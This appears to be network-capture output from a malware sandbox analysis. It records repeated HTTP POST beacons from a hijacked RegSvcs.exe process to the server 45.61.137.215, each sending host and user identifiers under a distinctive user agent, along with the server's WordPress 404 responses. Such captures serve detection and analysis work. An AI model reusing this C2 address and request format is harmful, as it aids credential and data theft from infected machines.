                                            May 29, 2024 15:42:36.437973976 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:42:36.438196898 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:42:36.438206911 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:42:36.438265085 CEST224INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !impo
                                            May 29, 2024 15:42:36.438273907 CEST1236INData Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d
                                            Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
                                            May 29, 2024 15:42:36.438282013 CEST224INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a
                                            Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
                                            May 29, 2024 15:42:36.438488960 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:42:36.438508987 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:42:36.438519001 CEST1236INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.94972445.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:36.746085882 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:42:36.751032114 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:42:39.194941998 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:37 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:42:39.194978952 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:42:39.194992065 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:42:39.195003986 CEST672INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:42:39.195017099 CEST1236INData Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d
                                            Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
                                            May 29, 2024 15:42:39.195029020 CEST224INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a
                                            Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
                                            May 29, 2024 15:42:39.195656061 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:42:39.195713043 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:42:39.195751905 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:42:39.195765972 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.94972545.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:39.353995085 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:42:39.358983040 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:42:41.803802013 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:39 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:42:41.803814888 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:42:41.803833008 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:42:41.803842068 CEST224INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener(
                                            May 29, 2024 15:42:41.803853035 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:42:41.803885937 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:42:41.803896904 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:42:41.804090977 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:42:41.804133892 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:42:41.804143906 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.94972645.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:41.960860968 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:42:41.967647076 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:42:47.378247976 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:45 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 